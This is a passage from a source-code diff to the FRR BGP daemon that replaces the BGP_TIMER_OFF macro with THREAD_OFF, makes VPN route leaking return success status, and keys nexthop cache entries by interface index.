@@ -365,23 +365,23 @@ void bgp_timer_set(struct peer *peer)
inactive. All other timer must be turned off */
if (BGP_PEER_START_SUPPRESSED(peer) || !peer_active(peer)
|| peer->bgp->vrf_id == VRF_UNKNOWN) {
- BGP_TIMER_OFF(peer->t_start);
+ THREAD_OFF(peer->t_start);
} else {
BGP_TIMER_ON(peer->t_start, bgp_start_timer,
peer->v_start);
}
- BGP_TIMER_OFF(peer->t_connect);
- BGP_TIMER_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_holdtime);
bgp_keepalives_off(peer);
- BGP_TIMER_OFF(peer->t_routeadv);
- BGP_TIMER_OFF(peer->t_delayopen);
+ THREAD_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_delayopen);
break;
case Connect:
/* After start timer is expired, the peer moves to Connect
status. Make sure start timer is off and connect timer is
on. */
- BGP_TIMER_OFF(peer->t_start);
+ THREAD_OFF(peer->t_start);
if (CHECK_FLAG(peer->flags, PEER_FLAG_TIMER_DELAYOPEN))
BGP_TIMER_ON(peer->t_connect, bgp_connect_timer,
(peer->v_delayopen + peer->v_connect));
@@ -389,19 +389,19 @@ void bgp_timer_set(struct peer *peer)
BGP_TIMER_ON(peer->t_connect, bgp_connect_timer,
peer->v_connect);
- BGP_TIMER_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_holdtime);
bgp_keepalives_off(peer);
- BGP_TIMER_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_routeadv);
break;
case Active:
/* Active is waiting connection from remote peer. And if
connect timer is expired, change status to Connect. */
- BGP_TIMER_OFF(peer->t_start);
+ THREAD_OFF(peer->t_start);
/* If peer is passive mode, do not set connect timer. */
if (CHECK_FLAG(peer->flags, PEER_FLAG_PASSIVE)
|| CHECK_FLAG(peer->sflags, PEER_STATUS_NSF_WAIT)) {
- BGP_TIMER_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_connect);
} else {
if (CHECK_FLAG(peer->flags, PEER_FLAG_TIMER_DELAYOPEN))
BGP_TIMER_ON(
@@ -411,56 +411,56 @@ void bgp_timer_set(struct peer *peer)
BGP_TIMER_ON(peer->t_connect, bgp_connect_timer,
peer->v_connect);
}
- BGP_TIMER_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_holdtime);
bgp_keepalives_off(peer);
- BGP_TIMER_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_routeadv);
break;
case OpenSent:
/* OpenSent status. */
- BGP_TIMER_OFF(peer->t_start);
- BGP_TIMER_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_start);
+ THREAD_OFF(peer->t_connect);
if (peer->v_holdtime != 0) {
BGP_TIMER_ON(peer->t_holdtime, bgp_holdtime_timer,
peer->v_holdtime);
} else {
- BGP_TIMER_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_holdtime);
}
bgp_keepalives_off(peer);
- BGP_TIMER_OFF(peer->t_routeadv);
- BGP_TIMER_OFF(peer->t_delayopen);
+ THREAD_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_delayopen);
break;
case OpenConfirm:
/* OpenConfirm status. */
- BGP_TIMER_OFF(peer->t_start);
- BGP_TIMER_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_start);
+ THREAD_OFF(peer->t_connect);
/* If the negotiated Hold Time value is zero, then the Hold Time
timer and KeepAlive timers are not started. */
if (peer->v_holdtime == 0) {
- BGP_TIMER_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_holdtime);
bgp_keepalives_off(peer);
} else {
BGP_TIMER_ON(peer->t_holdtime, bgp_holdtime_timer,
peer->v_holdtime);
bgp_keepalives_on(peer);
}
- BGP_TIMER_OFF(peer->t_routeadv);
- BGP_TIMER_OFF(peer->t_delayopen);
+ THREAD_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_delayopen);
break;
case Established:
/* In Established status start and connect timer is turned
off. */
- BGP_TIMER_OFF(peer->t_start);
- BGP_TIMER_OFF(peer->t_connect);
- BGP_TIMER_OFF(peer->t_delayopen);
+ THREAD_OFF(peer->t_start);
+ THREAD_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_delayopen);
/* Same as OpenConfirm, if holdtime is zero then both holdtime
and keepalive must be turned off. */
if (peer->v_holdtime == 0) {
- BGP_TIMER_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_holdtime);
bgp_keepalives_off(peer);
} else {
BGP_TIMER_ON(peer->t_holdtime, bgp_holdtime_timer,
@@ -469,22 +469,22 @@ void bgp_timer_set(struct peer *peer)
}
break;
case Deleted:
- BGP_TIMER_OFF(peer->t_gr_restart);
- BGP_TIMER_OFF(peer->t_gr_stale);
+ THREAD_OFF(peer->t_gr_restart);
+ THREAD_OFF(peer->t_gr_stale);
FOREACH_AFI_SAFI (afi, safi)
- BGP_TIMER_OFF(peer->t_llgr_stale[afi][safi]);
+ THREAD_OFF(peer->t_llgr_stale[afi][safi]);
- BGP_TIMER_OFF(peer->t_pmax_restart);
- BGP_TIMER_OFF(peer->t_refresh_stalepath);
+ THREAD_OFF(peer->t_pmax_restart);
+ THREAD_OFF(peer->t_refresh_stalepath);
/* fallthru */
case Clearing:
- BGP_TIMER_OFF(peer->t_start);
- BGP_TIMER_OFF(peer->t_connect);
- BGP_TIMER_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_start);
+ THREAD_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_holdtime);
bgp_keepalives_off(peer);
- BGP_TIMER_OFF(peer->t_routeadv);
- BGP_TIMER_OFF(peer->t_delayopen);
+ THREAD_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_delayopen);
break;
case BGP_STATUS_MAX:
flog_err(EC_LIB_DEVELOPMENT,
@@ -516,7 +516,7 @@ static void bgp_connect_timer(struct thread *thread)
peer = THREAD_ARG(thread);
/* stop the DelayOpenTimer if it is running */
- BGP_TIMER_OFF(peer->t_delayopen);
+ THREAD_OFF(peer->t_delayopen);
assert(!peer->t_write);
assert(!peer->t_read);
@@ -647,7 +647,7 @@ static void bgp_graceful_restart_timer_off(struct peer *peer)
return;
UNSET_FLAG(peer->sflags, PEER_STATUS_NSF_WAIT);
- BGP_TIMER_OFF(peer->t_gr_stale);
+ THREAD_OFF(peer->t_gr_stale);
if (peer_dynamic_neighbor(peer) &&
!(CHECK_FLAG(peer->flags, PEER_FLAG_DELETE))) {
@@ -965,7 +965,7 @@ void bgp_start_routeadv(struct bgp *bgp)
for (ALL_LIST_ELEMENTS(bgp->peer, node, nnode, peer)) {
if (!peer_established(peer))
continue;
- BGP_TIMER_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_routeadv);
BGP_TIMER_ON(peer->t_routeadv, bgp_routeadv_timer, 0);
}
}
@@ -985,7 +985,7 @@ void bgp_adjust_routeadv(struct peer *peer)
* different
* duration and schedule write thread immediately.
*/
- BGP_TIMER_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_routeadv);
peer->synctime = bgp_clock();
/* If suppress fib pending is enabled, route is advertised to
@@ -1017,7 +1017,7 @@ void bgp_adjust_routeadv(struct peer *peer)
*/
diff = difftime(nowtime, peer->last_update);
if (diff > (double)peer->v_routeadv) {
- BGP_TIMER_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_routeadv);
BGP_TIMER_ON(peer->t_routeadv, bgp_routeadv_timer, 0);
return;
}
@@ -1044,7 +1044,7 @@ void bgp_adjust_routeadv(struct peer *peer)
remain = peer->v_routeadv;
diff = peer->v_routeadv - diff;
if (diff <= (double)remain) {
- BGP_TIMER_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_routeadv);
BGP_TIMER_ON(peer->t_routeadv, bgp_routeadv_timer, diff);
}
}
@@ -1401,7 +1401,7 @@ int bgp_stop(struct peer *peer)
/* graceful restart */
if (peer->t_gr_stale) {
- BGP_TIMER_OFF(peer->t_gr_stale);
+ THREAD_OFF(peer->t_gr_stale);
if (bgp_debug_neighbor_events(peer))
zlog_debug(
"%pBP graceful restart stalepath timer stopped",
@@ -1431,7 +1431,7 @@ int bgp_stop(struct peer *peer)
/* Stop route-refresh stalepath timer */
if (peer->t_refresh_stalepath) {
- BGP_TIMER_OFF(peer->t_refresh_stalepath);
+ THREAD_OFF(peer->t_refresh_stalepath);
if (bgp_debug_neighbor_events(peer))
zlog_debug(
@@ -1464,8 +1464,7 @@ int bgp_stop(struct peer *peer)
/* There is no pending EOR message */
if (gr_info->eor_required == 0) {
- BGP_TIMER_OFF(
- gr_info->t_select_deferral);
+ THREAD_OFF(gr_info->t_select_deferral);
gr_info->eor_received = 0;
}
}
@@ -1494,14 +1493,14 @@ int bgp_stop(struct peer *peer)
THREAD_OFF(peer->t_connect_check_w);
/* Stop all timers. */
- BGP_TIMER_OFF(peer->t_start);
- BGP_TIMER_OFF(peer->t_connect);
- BGP_TIMER_OFF(peer->t_holdtime);
- BGP_TIMER_OFF(peer->t_routeadv);
- BGP_TIMER_OFF(peer->t_delayopen);
+ THREAD_OFF(peer->t_start);
+ THREAD_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_delayopen);
/* Clear input and output buffer. */
- frr_with_mutex(&peer->io_mtx) {
+ frr_with_mutex (&peer->io_mtx) {
if (peer->ibuf)
stream_fifo_clean(peer->ibuf);
if (peer->obuf)
@@ -1993,7 +1992,7 @@ static int bgp_fsm_holdtime_expire(struct peer *peer)
static int bgp_fsm_delayopen_timer_expire(struct peer *peer)
{
/* Stop the DelayOpenTimer */
- BGP_TIMER_OFF(peer->t_delayopen);
+ THREAD_OFF(peer->t_delayopen);
/* Send open message to peer */
bgp_open_send(peer);
@@ -2203,7 +2202,7 @@ static int bgp_establish(struct peer *peer)
else {
UNSET_FLAG(peer->sflags, PEER_STATUS_NSF_MODE);
if (peer->t_gr_stale) {
- BGP_TIMER_OFF(peer->t_gr_stale);
+ THREAD_OFF(peer->t_gr_stale);
if (bgp_debug_neighbor_events(peer))
zlog_debug(
"%pBP graceful restart stalepath timer stopped",
@@ -2212,7 +2211,7 @@ static int bgp_establish(struct peer *peer)
}
if (peer->t_gr_restart) {
- BGP_TIMER_OFF(peer->t_gr_restart);
+ THREAD_OFF(peer->t_gr_restart);
if (bgp_debug_neighbor_events(peer))
zlog_debug("%pBP graceful restart timer stopped", peer);
}
@@ -2228,7 +2227,7 @@ static int bgp_establish(struct peer *peer)
*/
FOREACH_AFI_SAFI (afi, safi) {
if (peer->t_llgr_stale[afi][safi]) {
- BGP_TIMER_OFF(peer->t_llgr_stale[afi][safi]);
+ THREAD_OFF(peer->t_llgr_stale[afi][safi]);
if (bgp_debug_neighbor_events(peer))
zlog_debug(
"%pBP Long-lived stale timer stopped for afi/safi: %d/%d",
@@ -2273,7 +2272,7 @@ static int bgp_establish(struct peer *peer)
* of read-only mode.
*/
if (!bgp_update_delay_active(peer->bgp)) {
- BGP_TIMER_OFF(peer->t_routeadv);
+ THREAD_OFF(peer->t_routeadv);
BGP_TIMER_ON(peer->t_routeadv, bgp_routeadv_timer, 0);
}
@@ -2309,14 +2308,14 @@ static int bgp_establish(struct peer *peer)
/* Keepalive packet is received. */
static int bgp_fsm_keepalive(struct peer *peer)
{
- BGP_TIMER_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_holdtime);
return 0;
}
/* Update packet is received. */
static int bgp_fsm_update(struct peer *peer)
{
- BGP_TIMER_OFF(peer->t_holdtime);
+ THREAD_OFF(peer->t_holdtime);
return 0;
}
@@ -2358,13 +2357,13 @@ void bgp_fsm_nht_update(struct peer *peer, bool has_valid_nexthops)
break;
case Connect:
if (!has_valid_nexthops) {
- BGP_TIMER_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_connect);
BGP_EVENT_ADD(peer, TCP_fatal_error);
}
break;
case Active:
if (has_valid_nexthops) {
- BGP_TIMER_OFF(peer->t_connect);
+ THREAD_OFF(peer->t_connect);
BGP_EVENT_ADD(peer, ConnectRetry_timer_expired);
}
break;
diff --git a/bgpd/bgp_fsm.h b/bgpd/bgp_fsm.h
index 765a5aec5e..aaf6c480b2 100644
--- a/bgpd/bgp_fsm.h
+++ b/bgpd/bgp_fsm.h
@@ -29,11 +29,6 @@
thread_add_timer(bm->master, (F), peer, (V), &(T)); \
} while (0)
-#define BGP_TIMER_OFF(T) \
- do { \
- THREAD_OFF((T)); \
- } while (0)
-
#define BGP_EVENT_ADD(P, E) \
do { \
if ((P)->status != Deleted) \
diff --git a/bgpd/bgp_io.c b/bgpd/bgp_io.c
index 75d34a84e0..aba28fa504 100644
--- a/bgpd/bgp_io.c
+++ b/bgpd/bgp_io.c
@@ -134,7 +134,7 @@ static void bgp_process_writes(struct thread *thread)
struct frr_pthread *fpt = bgp_pth_io;
- frr_with_mutex(&peer->io_mtx) {
+ frr_with_mutex (&peer->io_mtx) {
status = bgp_write(peer);
reschedule = (stream_fifo_head(peer->obuf) != NULL);
}
@@ -188,7 +188,7 @@ static void bgp_process_reads(struct thread *thread)
struct frr_pthread *fpt = bgp_pth_io;
- frr_with_mutex(&peer->io_mtx) {
+ frr_with_mutex (&peer->io_mtx) {
status = bgp_read(peer, &code);
}
@@ -247,7 +247,7 @@ static void bgp_process_reads(struct thread *thread)
stream_set_endp(pkt, pktsize);
frrtrace(2, frr_bgp, packet_read, peer, pkt);
- frr_with_mutex(&peer->io_mtx) {
+ frr_with_mutex (&peer->io_mtx) {
stream_fifo_push(peer->ibuf, pkt);
}
diff --git a/bgpd/bgp_keepalives.c b/bgpd/bgp_keepalives.c
index 86202a0e3d..158f163358 100644
--- a/bgpd/bgp_keepalives.c
+++ b/bgpd/bgp_keepalives.c
@@ -252,7 +252,7 @@ void bgp_keepalives_on(struct peer *peer)
*/
assert(peerhash_mtx);
- frr_with_mutex(peerhash_mtx) {
+ frr_with_mutex (peerhash_mtx) {
holder.peer = peer;
if (!hash_lookup(peerhash, &holder)) {
struct pkat *pkat = pkat_new(peer);
@@ -280,7 +280,7 @@ void bgp_keepalives_off(struct peer *peer)
*/
assert(peerhash_mtx);
- frr_with_mutex(peerhash_mtx) {
+ frr_with_mutex (peerhash_mtx) {
holder.peer = peer;
struct pkat *res = hash_release(peerhash, &holder);
if (res) {
@@ -293,7 +293,7 @@ void bgp_keepalives_off(struct peer *peer)
void bgp_keepalives_wake(void)
{
- frr_with_mutex(peerhash_mtx) {
+ frr_with_mutex (peerhash_mtx) {
pthread_cond_signal(peerhash_cond);
}
}
diff --git a/bgpd/bgp_mplsvpn.c b/bgpd/bgp_mplsvpn.c
index 52180b3e48..7b8f0df2e2 100644
--- a/bgpd/bgp_mplsvpn.c
+++ b/bgpd/bgp_mplsvpn.c
@@ -1472,7 +1472,7 @@ void vpn_leak_from_vrf_update_all(struct bgp *to_bgp, struct bgp *from_bgp,
}
}
-static void
+static bool
vpn_leak_to_vrf_update_onevrf(struct bgp *to_bgp, /* to */
struct bgp *from_bgp, /* from */
struct bgp_path_info *path_vpn) /* route */
@@ -1498,7 +1498,7 @@ vpn_leak_to_vrf_update_onevrf(struct bgp *to_bgp, /* to */
if (!vpn_leak_from_vpn_active(to_bgp, afi, &debugmsg)) {
if (debug)
zlog_debug("%s: skipping: %s", __func__, debugmsg);
- return;
+ return false;
}
/* Check for intersection of route targets */
@@ -1509,7 +1509,7 @@ vpn_leak_to_vrf_update_onevrf(struct bgp *to_bgp, /* to */
zlog_debug(
"from vpn (%s) to vrf (%s), skipping after no intersection of route targets",
from_bgp->name_pretty, to_bgp->name_pretty);
- return;
+ return false;
}
if (debug)
@@ -1604,7 +1604,7 @@ vpn_leak_to_vrf_update_onevrf(struct bgp *to_bgp, /* to */
to_bgp->vpn_policy[afi]
.rmap[BGP_VPN_POLICY_DIR_FROMVPN]
->name);
- return;
+ return false;
}
/*
* if route-map changed nexthop, don't nexthop-self on output
@@ -1674,13 +1674,15 @@ vpn_leak_to_vrf_update_onevrf(struct bgp *to_bgp, /* to */
leak_update(to_bgp, bn, new_attr, afi, safi, path_vpn, pLabels,
num_labels, src_vrf, &nexthop_orig, nexthop_self_flag,
debug);
+ return true;
}
-void vpn_leak_to_vrf_update(struct bgp *from_bgp, /* from */
+bool vpn_leak_to_vrf_update(struct bgp *from_bgp, /* from */
struct bgp_path_info *path_vpn) /* route */
{
struct listnode *mnode, *mnnode;
struct bgp *bgp;
+ bool leak_success = false;
int debug = BGP_DEBUG(vpn, VPN_LEAK_TO_VRF);
@@ -1692,9 +1694,11 @@ void vpn_leak_to_vrf_update(struct bgp *from_bgp, /* from */
if (!path_vpn->extra
|| path_vpn->extra->bgp_orig != bgp) { /* no loop */
- vpn_leak_to_vrf_update_onevrf(bgp, from_bgp, path_vpn);
+ leak_success |= vpn_leak_to_vrf_update_onevrf(
+ bgp, from_bgp, path_vpn);
}
}
+ return leak_success;
}
void vpn_leak_to_vrf_withdraw(struct bgp *from_bgp, /* from */
@@ -2487,7 +2491,7 @@ DEFUN (show_ip_bgp_vpn_rd,
IP_STR
BGP_STR
BGP_AFI_HELP_STR
- "Address Family modifier\n"
+ BGP_AF_MODIFIER_STR
"Display information for a route distinguisher\n"
"VPN Route Distinguisher\n"
"All VPN Route Distinguishers\n")
diff --git a/bgpd/bgp_mplsvpn.h b/bgpd/bgp_mplsvpn.h
index fcabb16435..c5cc7d4294 100644
--- a/bgpd/bgp_mplsvpn.h
+++ b/bgpd/bgp_mplsvpn.h
@@ -25,6 +25,7 @@
#include "bgpd/bgp_route.h"
#include "bgpd/bgp_rd.h"
#include "bgpd/bgp_zebra.h"
+#include "bgpd/bgp_vty.h"
#define MPLS_LABEL_IS_SPECIAL(label) ((label) <= MPLS_LABEL_EXTENSION)
#define MPLS_LABEL_IS_NULL(label) \
@@ -32,9 +33,7 @@
|| (label) == MPLS_LABEL_IPV6_EXPLICIT_NULL \
|| (label) == MPLS_LABEL_IMPLICIT_NULL)
-#define BGP_VPNVX_HELP_STR \
- "Address Family\n" \
- "Address Family\n"
+#define BGP_VPNVX_HELP_STR BGP_AF_STR BGP_AF_STR
#define V4_HEADER \
" Network Next Hop Metric LocPrf Weight Path\n"
@@ -70,7 +69,7 @@ extern void vpn_leak_to_vrf_withdraw_all(struct bgp *to_bgp, afi_t afi);
extern void vpn_leak_to_vrf_update_all(struct bgp *to_bgp, struct bgp *from_bgp,
afi_t afi);
-extern void vpn_leak_to_vrf_update(struct bgp *from_bgp,
+extern bool vpn_leak_to_vrf_update(struct bgp *from_bgp,
struct bgp_path_info *path_vpn);
extern void vpn_leak_to_vrf_withdraw(struct bgp *from_bgp,
@@ -233,8 +232,14 @@ static inline void vpn_leak_postchange(enum vpn_policy_direction direction,
if (!bgp_vpn)
return;
- if (direction == BGP_VPN_POLICY_DIR_FROMVPN)
- vpn_leak_to_vrf_update_all(bgp_vrf, bgp_vpn, afi);
+ if (direction == BGP_VPN_POLICY_DIR_FROMVPN) {
+ /* trigger a flush to re-sync with ADJ-RIB-in */
+ if (!CHECK_FLAG(bgp_vpn->af_flags[afi][SAFI_MPLS_VPN],
+ BGP_VPNVX_RETAIN_ROUTE_TARGET_ALL))
+ bgp_clear_soft_in(bgp_vpn, afi, SAFI_MPLS_VPN);
+ else
+ vpn_leak_to_vrf_update_all(bgp_vrf, bgp_vpn, afi);
+ }
if (direction == BGP_VPN_POLICY_DIR_TOVPN) {
if (bgp_vrf->vpn_policy[afi].tovpn_label !=
diff --git a/bgpd/bgp_network.c b/bgpd/bgp_network.c
index da4cc03b66..9ecc2ae4e4 100644
--- a/bgpd/bgp_network.c
+++ b/bgpd/bgp_network.c
@@ -429,7 +429,7 @@ static void bgp_accept(struct thread *thread)
sockopt_tcp_mss_set(bgp_sock, peer1->tcp_mss);
bgp_fsm_change_status(peer1, Active);
- BGP_TIMER_OFF(
+ THREAD_OFF(
peer1->t_start); /* created in peer_create() */
if (peer_active(peer1)) {
@@ -558,7 +558,7 @@ static void bgp_accept(struct thread *thread)
}
bgp_peer_reg_with_nht(peer);
bgp_fsm_change_status(peer, Active);
- BGP_TIMER_OFF(peer->t_start); /* created in peer_create() */
+ THREAD_OFF(peer->t_start); /* created in peer_create() */
SET_FLAG(peer->sflags, PEER_STATUS_ACCEPT_PEER);
/* Make dummy peer until read Open packet. */
diff --git a/bgpd/bgp_nexthop.c b/bgpd/bgp_nexthop.c
index c6043807dd..e1fcc743ec 100644
--- a/bgpd/bgp_nexthop.c
+++ b/bgpd/bgp_nexthop.c
@@ -56,6 +56,11 @@ int bgp_nexthop_cache_compare(const struct bgp_nexthop_cache *a,
if (a->srte_color > b->srte_color)
return 1;
+ if (a->ifindex < b->ifindex)
+ return -1;
+ if (a->ifindex > b->ifindex)
+ return 1;
+
return prefix_cmp(&a->prefix, &b->prefix);
}
@@ -70,13 +75,15 @@ void bnc_nexthop_free(struct bgp_nexthop_cache *bnc)
}
struct bgp_nexthop_cache *bnc_new(struct bgp_nexthop_cache_head *tree,
- struct prefix *prefix, uint32_t srte_color)
+ struct prefix *prefix, uint32_t srte_color,
+ ifindex_t ifindex)
{
struct bgp_nexthop_cache *bnc;
bnc = XCALLOC(MTYPE_BGP_NEXTHOP_CACHE,
sizeof(struct bgp_nexthop_cache));
bnc->prefix = *prefix;
+ bnc->ifindex = ifindex;
bnc->srte_color = srte_color;
bnc->tree = tree;
LIST_INIT(&(bnc->paths));
@@ -106,7 +113,8 @@ void bnc_free(struct bgp_nexthop_cache *bnc)
}
struct bgp_nexthop_cache *bnc_find(struct bgp_nexthop_cache_head *tree,
- struct prefix *prefix, uint32_t srte_color)
+ struct prefix *prefix, uint32_t srte_color,
+ ifindex_t ifindex)
{
struct bgp_nexthop_cache bnc = {};
@@ -115,6 +123,7 @@ struct bgp_nexthop_cache *bnc_find(struct bgp_nexthop_cache_head *tree,
bnc.prefix = *prefix;
bnc.srte_color = srte_color;
+ bnc.ifindex = ifindex;
return bgp_nexthop_cache_find(tree, &bnc);
}
@@ -915,7 +924,7 @@ static int show_ip_bgp_nexthop_table(struct vty *vty, const char *name,
}
tree = import_table ? &bgp->import_check_table
: &bgp->nexthop_cache_table;
- bnc = bnc_find(tree[family2afi(nhop.family)], &nhop, 0);
+ bnc = bnc_find(tree[family2afi(nhop.family)], &nhop, 0, 0);
if (!bnc) {
vty_out(vty, "specified nexthop does not have entry\n");
return CMD_SUCCESS;
diff --git a/bgpd/bgp_nexthop.h b/bgpd/bgp_nexthop.h
index 16c2b6c65a..9d653ef4dc 100644
--- a/bgpd/bgp_nexthop.h
+++ b/bgpd/bgp_nexthop.h
@@ -152,12 +152,14 @@ extern bool bgp_nexthop_self(struct bgp *bgp, afi_t afi, uint8_t type,
struct bgp_dest *dest);
extern struct bgp_nexthop_cache *bnc_new(struct bgp_nexthop_cache_head *tree,
struct prefix *prefix,
- uint32_t srte_color);
+ uint32_t srte_color,
+ ifindex_t ifindex);
extern bool bnc_existing_for_prefix(struct bgp_nexthop_cache *bnc);
extern void bnc_free(struct bgp_nexthop_cache *bnc);
extern struct bgp_nexthop_cache *bnc_find(struct bgp_nexthop_cache_head *tree,
struct prefix *prefix,
- uint32_t srte_color);
+ uint32_t srte_color,
+ ifindex_t ifindex);
extern void bnc_nexthop_free(struct bgp_nexthop_cache *bnc);
extern const char *bnc_str(struct bgp_nexthop_cache *bnc, char *buf, int size);
extern void bgp_scan_init(struct bgp *bgp);
diff --git a/bgpd/bgp_nht.c b/bgpd/bgp_nht.c
index 3ab67a6181..e03e83db2c 100644
--- a/bgpd/bgp_nht.c
+++ b/bgpd/bgp_nht.c
@@ -84,9 +84,10 @@ static void bgp_unlink_nexthop_check(struct bgp_nexthop_cache *bnc)
if (LIST_EMPTY(&(bnc->paths)) && !bnc->nht_info) {
if (BGP_DEBUG(nht, NHT)) {
char buf[PREFIX2STR_BUFFER];
- zlog_debug("%s: freeing bnc %s(%u)(%s)", __func__,
+ zlog_debug("%s: freeing bnc %s(%d)(%u)(%s)", __func__,
bnc_str(bnc, buf, PREFIX2STR_BUFFER),
- bnc->srte_color, bnc->bgp->name_pretty);
+ bnc->ifindex, bnc->srte_color,
+ bnc->bgp->name_pretty);
}
/* only unregister if this is the last nh for this prefix*/
if (!bnc_existing_for_prefix(bnc))
@@ -113,17 +114,32 @@ void bgp_replace_nexthop_by_peer(struct peer *from, struct peer *to)
struct prefix pt;
struct bgp_nexthop_cache *bncp, *bnct;
afi_t afi;
+ ifindex_t ifindex = 0;
if (!sockunion2hostprefix(&from->su, &pp))
return;
+ /*
+ * Gather the ifindex for if up/down events to be
+ * tagged into this fun
+ */
+ if (from->conf_if && IN6_IS_ADDR_LINKLOCAL(&from->su.sin6.sin6_addr))
+ ifindex = from->su.sin6.sin6_scope_id;
+
afi = family2afi(pp.family);
- bncp = bnc_find(&from->bgp->nexthop_cache_table[afi], &pp, 0);
+ bncp = bnc_find(&from->bgp->nexthop_cache_table[afi], &pp, 0, ifindex);
if (!sockunion2hostprefix(&to->su, &pt))
return;
- bnct = bnc_find(&to->bgp->nexthop_cache_table[afi], &pt, 0);
+ /*
+ * Gather the ifindex for if up/down events to be
+ * tagged into this fun
+ */
+ ifindex = 0;
+ if (to->conf_if && IN6_IS_ADDR_LINKLOCAL(&to->su.sin6.sin6_addr))
+ ifindex = to->su.sin6.sin6_scope_id;
+ bnct = bnc_find(&to->bgp->nexthop_cache_table[afi], &pt, 0, ifindex);
if (bnct != bncp)
return;
@@ -137,11 +153,17 @@ void bgp_unlink_nexthop_by_peer(struct peer *peer)
struct prefix p;
struct bgp_nexthop_cache *bnc;
afi_t afi = family2afi(peer->su.sa.sa_family);
+ ifindex_t ifindex = 0;
if (!sockunion2hostprefix(&peer->su, &p))
return;
-
- bnc = bnc_find(&peer->bgp->nexthop_cache_table[afi], &p, 0);
+ /*
+ * Gather the ifindex for if up/down events to be
+ * tagged into this fun
+ */
+ if (afi == AFI_IP6 && IN6_IS_ADDR_LINKLOCAL(&peer->su.sin6.sin6_addr))
+ ifindex = peer->su.sin6.sin6_scope_id;
+ bnc = bnc_find(&peer->bgp->nexthop_cache_table[afi], &p, 0, ifindex);
if (!bnc)
return;
@@ -206,9 +228,18 @@ int bgp_find_or_add_nexthop(struct bgp *bgp_route, struct bgp *bgp_nexthop,
* Gather the ifindex for if up/down events to be
* tagged into this fun
*/
- if (afi == AFI_IP6
- && IN6_IS_ADDR_LINKLOCAL(&peer->su.sin6.sin6_addr))
+ if (afi == AFI_IP6 &&
+ IN6_IS_ADDR_LINKLOCAL(&peer->su.sin6.sin6_addr)) {
ifindex = peer->su.sin6.sin6_scope_id;
+ if (ifindex == 0) {
+ if (BGP_DEBUG(nht, NHT)) {
+ zlog_debug(
+ "%s: Unable to locate ifindex, waiting till we have one",
+ peer->conf_if);
+ }
+ return 0;
+ }
+ }
if (!sockunion2hostprefix(&peer->su, &p)) {
if (BGP_DEBUG(nht, NHT)) {
@@ -226,28 +257,27 @@ int bgp_find_or_add_nexthop(struct bgp *bgp_route, struct bgp *bgp_nexthop,
else
tree = &bgp_nexthop->nexthop_cache_table[afi];
- bnc = bnc_find(tree, &p, srte_color);
+ bnc = bnc_find(tree, &p, srte_color, ifindex);
if (!bnc) {
- bnc = bnc_new(tree, &p, srte_color);
+ bnc = bnc_new(tree, &p, srte_color, ifindex);
bnc->bgp = bgp_nexthop;
- bnc->ifindex = ifindex;
if (BGP_DEBUG(nht, NHT)) {
char buf[PREFIX2STR_BUFFER];
- zlog_debug("Allocated bnc %s(%u)(%s) peer %p",
+ zlog_debug("Allocated bnc %s(%d)(%u)(%s) peer %p",
bnc_str(bnc, buf, PREFIX2STR_BUFFER),
- bnc->srte_color, bnc->bgp->name_pretty,
- peer);
+ bnc->ifindex, bnc->srte_color,
+ bnc->bgp->name_pretty, peer);
}
} else {
if (BGP_DEBUG(nht, NHT)) {
char buf[PREFIX2STR_BUFFER];
zlog_debug(
- "Found existing bnc %s(%s) flags 0x%x ifindex %d #paths %d peer %p",
+ "Found existing bnc %s(%d)(%s) flags 0x%x ifindex %d #paths %d peer %p",
bnc_str(bnc, buf, PREFIX2STR_BUFFER),
- bnc->bgp->name_pretty, bnc->flags, bnc->ifindex,
- bnc->path_count, bnc->nht_info);
+ bnc->ifindex, bnc->bgp->name_pretty, bnc->flags,
+ bnc->ifindex, bnc->path_count, bnc->nht_info);
}
}
@@ -351,15 +381,21 @@ void bgp_delete_connected_nexthop(afi_t afi, struct peer *peer)
{
struct bgp_nexthop_cache *bnc;
struct prefix p;
+ ifindex_t ifindex = 0;
if (!peer)
return;
if (!sockunion2hostprefix(&peer->su, &p))
return;
-
+ /*
+ * Gather the ifindex for if up/down events to be
+ * tagged into this fun
+ */
+ if (afi == AFI_IP6 && IN6_IS_ADDR_LINKLOCAL(&peer->su.sin6.sin6_addr))
+ ifindex = peer->su.sin6.sin6_scope_id;
bnc = bnc_find(&peer->bgp->nexthop_cache_table[family2afi(p.family)],
- &p, 0);
+ &p, 0, ifindex);
if (!bnc) {
if (BGP_DEBUG(nht, NHT))
zlog_debug(
@@ -408,9 +444,9 @@ static void bgp_process_nexthop_update(struct bgp_nexthop_cache *bnc,
char bnc_buf[BNC_FLAG_DUMP_SIZE];
zlog_debug(
- "%s(%u): Rcvd NH update %pFX(%u) - metric %d/%d #nhops %d/%d flags %s",
+ "%s(%u): Rcvd NH update %pFX(%u)%u) - metric %d/%d #nhops %d/%d flags %s",
bnc->bgp->name_pretty, bnc->bgp->vrf_id, &nhr->prefix,
- bnc->srte_color, nhr->metric, bnc->metric,
+ bnc->ifindex, bnc->srte_color, nhr->metric, bnc->metric,
nhr->nexthop_num, bnc->nexthop_num,
bgp_nexthop_dump_bnc_flags(bnc, bnc_buf,
